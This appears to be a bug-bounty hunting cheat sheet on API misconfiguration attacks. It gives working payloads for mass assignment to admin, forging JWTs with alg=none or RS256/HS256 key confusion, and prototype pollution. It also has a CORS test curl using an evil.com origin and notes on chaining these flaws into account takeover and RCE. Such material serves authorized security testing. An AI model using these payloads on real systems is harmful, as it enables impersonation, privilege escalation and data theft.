12. API SECURITY MISCONFIGURATION
Mass Assignment
User.update(req.body) // body has {"role": "admin"} → privilege escalation
JWT None Algorithm
header = {"alg": "none", "typ": "JWT"}
payload = {"sub": 1, "role": "admin"}
token = base64(header) + "." + base64(payload) + "." # no signature
JWT RS256 → HS256 Algorithm Confusion
# Get server's public key from /.well-known/jwks.json
# Sign token with public key as HMAC secret
token = jwt.encode({"sub": "admin", "role": "admin"}, pub_key, algorithm="HS256")
# Server uses RS256 key as HS256 secret → accepts it
Prototype Pollution
// Server-side — Node.js merge without protection
{"__proto__": {"admin": true}}
{"constructor": {"prototype": {"admin": true}}}
// URL: ?__proto__[isAdmin]=true&__proto__[role]=superadmin
CORS Exploitation
# Test: reflected origin + credentials
curl -s -I -H "Origin: https://evil.com" https://target.com/api/user/me
# If: Access-Control-Allow-Origin: https://evil.com + Access-Control-Allow-Credentials: true
# → CRITICAL: attacker reads credentialed responses
Related Skills & Chains
hunt-ato— Mass assignment on signup/profile is the fastest path to admin. Chain primitive: API mass assignment +hunt-ato→role=adminset on signup → ATO via privileged role on first login.hunt-auth-bypass— JWT flaws collapse the entire auth layer. Chain primitive: JWTalg=none+hunt-auth-bypass→ impersonate any user by settingsubto victim ID, no signature required.hunt-rce— Prototype pollution gadgets in Node.js dependencies (lodash, mongoose, jQuery) reachchild_process.spawn. Chain primitive: Prototype pollution (__proto__.shell=true) +hunt-rce(Node.js gadget chain) → RCE on the API node.hunt-subdomain— CORS regex with wildcard subdomain trusts a takeoverable host. Chain primitive: CORS allowlist*.target.com+ subdomain takeover → attacker-controlled origin reads credentialed API responses.security-arsenal— Load the JWT Attack Payloads section (alg=none, kid path traversal, JWK injection, embedded JWK) and the Mass-Assignment Field Wordlist (is_admin,role,verified,permissions,org_id,tenant_id).triage-validation— Apply the Server-Policy-vs-State gate: a permissive CORS header alone is informational; demonstrate actual cross-origin credentialed read of sensitive data before reporting.